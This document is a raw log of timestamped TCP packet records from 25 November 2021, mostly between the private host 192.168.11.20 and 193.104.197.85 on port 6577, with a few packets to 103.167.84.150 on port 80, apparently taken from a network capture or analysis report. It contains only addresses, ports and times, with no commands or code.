                          Nov 25, 2021 11:28:25.925750971 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:25.925908089 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:25.925947905 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:25.977950096 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:25.978024960 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:25.978079081 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:25.978132963 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:25.978147984 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:25.978251934 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:25.978307009 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:25.978365898 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:25.978425980 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:25.978478909 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:25.978646994 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:26.032718897 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.032799959 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.032835007 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.032866955 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.032917976 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.032927036 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:26.032968044 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.033011913 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.033101082 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:26.033262014 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:26.033428907 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:26.096429110 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.096446991 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.096601009 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.098241091 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.098359108 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.098634958 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.098764896 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.098778963 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.098849058 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:26.098893881 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.098907948 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.149593115 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.149854898 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.378840923 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:26.424679995 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:26.643469095 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:28:27.274494886 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.274677038 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.274703026 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.274808884 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.327310085 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.327352047 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.327487946 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.327538013 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.327568054 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.327590942 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.327755928 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.327938080 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.328165054 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.328337908 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.379548073 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.379595041 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.379857063 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.379882097 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.379965067 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.380001068 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.380021095 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.380199909 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.380357981 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.427907944 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.428138971 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.432534933 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.432585001 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.432640076 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.432672024 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.432706118 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.432869911 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.472701073 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.472929955 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.485232115 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.485279083 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.485311985 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.485460997 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.485589981 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.517347097 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.517610073 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.526989937 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.527221918 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.541141033 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.541210890 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.541244030 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.541462898 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.574146032 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.574492931 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.581644058 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.582032919 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.593337059 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.593393087 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.593430996 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.593517065 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.593676090 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.629250050 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.629488945 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.633435965 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.633797884 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.645292997 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.645509005 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.645741940 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.645787954 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.645941019 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.645951986 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.646111012 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.646286964 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.683209896 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.683485985 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.683605909 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.685518980 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.685834885 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.697962999 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.698008060 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.698041916 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.698072910 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.698105097 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.698167086 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.698474884 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.698596001 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.735551119 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.735752106 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.736638069 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.736861944 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.755489111 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.755536079 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.755568027 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.755676031 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.755846024 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:27.756825924 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.787241936 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.787617922 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.810885906 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.810935020 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.810967922 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:27.861745119 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.032896042 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.080447912 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.181082964 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.181185961 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.181236029 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.181287050 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.181359053 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.181533098 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.233973026 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.234018087 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.234050989 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.234081984 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.234112024 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.234143019 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.234160900 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.234219074 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.234256029 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.234334946 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.234436989 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.234472036 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.234502077 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.234509945 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.234668970 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.234839916 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.298479080 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.298783064 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.298984051 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.299036980 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.299092054 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.299124002 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.299154997 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.299185991 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.299216032 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.299246073 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.299405098 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.299438953 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.299521923 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.299686909 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.299719095 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.300497055 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.327748060 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.327994108 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.351383924 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.351464033 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.351497889 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.351532936 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.351578951 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.351608992 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.351644039 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.351805925 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.351974964 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.380141973 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.380455971 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.413254023 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.413305998 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.413338900 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.413371086 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.413400888 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.413573027 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.413685083 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.431921005 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.432163954 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.465814114 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.465883970 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.465919018 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.465950012 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.465980053 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.466012955 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.466170073 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.466336012 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.483488083 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.483768940 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.518241882 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.518306971 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.518337011 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.518374920 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.518618107 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.518749952 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.534825087 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.535018921 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.576919079 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.577263117 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.577378988 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.580471992 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.580530882 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.580569983 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.580607891 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.580790043 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.580895901 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.586961031 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.587299109 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.630033970 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.630094051 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.630407095 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.630525112 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.634224892 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.634283066 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.634321928 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.634358883 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.634428024 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.634582996 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.639316082 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.639517069 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.682002068 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.682070017 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.682251930 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:28.686206102 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.686266899 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.686564922 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.691056013 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.780344009 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:28.954247952 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.002139091 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.111462116 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.112859964 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.113014936 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.168524027 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.168587923 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.168622971 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.168653965 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.168684959 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.168715000 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.168745995 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.168776035 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.168893099 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.169008017 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.221514940 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.221616030 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.221767902 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.221770048 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.221946955 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.221998930 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.222012997 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.222022057 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.222032070 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.222042084 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.222310066 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.222466946 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.273992062 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.274090052 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.274100065 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.274107933 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.274116039 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.274175882 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.274204969 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.274322987 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.274333954 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.274350882 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.274549961 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.274683952 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.326401949 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.326452017 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.326483965 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.326518059 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.326724052 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.326831102 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.327667952 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.327934980 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.328305960 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.328402042 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.328490973 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.331943989 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.331990004 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.332161903 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.332283020 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.379328966 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.379415989 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.379456043 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.379492998 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.379529953 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.379547119 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.379705906 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.379868984 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.384166002 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.384366035 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.438242912 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.438294888 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.438328981 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.438359976 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.438390970 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.438421965 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.438452959 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.438483000 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.439066887 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.439138889 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.439188004 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.510160923 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.510238886 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.510276079 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.510351896 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.510385990 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.510417938 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.510441065 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.510463953 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.510514975 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.510608912 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.510775089 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.546566010 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.546911955 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:29.627074957 CET4980580192.168.11.20103.167.84.150
                          Nov 25, 2021 11:28:29.654717922 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.654767036 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.654798031 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.654829025 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.654859066 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.654890060 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.685750961 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:29.970953941 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.017446041 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.114892960 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.115118980 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.115231037 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.115392923 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.115530968 CET498066577192.168.11.20193.104.197.85
                          Nov 25, 2021 11:28:30.152952909 CET8049810103.167.84.150192.168.11.20
                          Nov 25, 2021 11:28:30.153224945 CET4981080192.168.11.20103.167.84.150
                          Nov 25, 2021 11:28:30.169374943 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.169488907 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.169497967 CET657749806193.104.197.85192.168.11.20
                          Nov 25, 2021 11:28:30.169503927 CET657749806193.104.197.85192.168.11.20
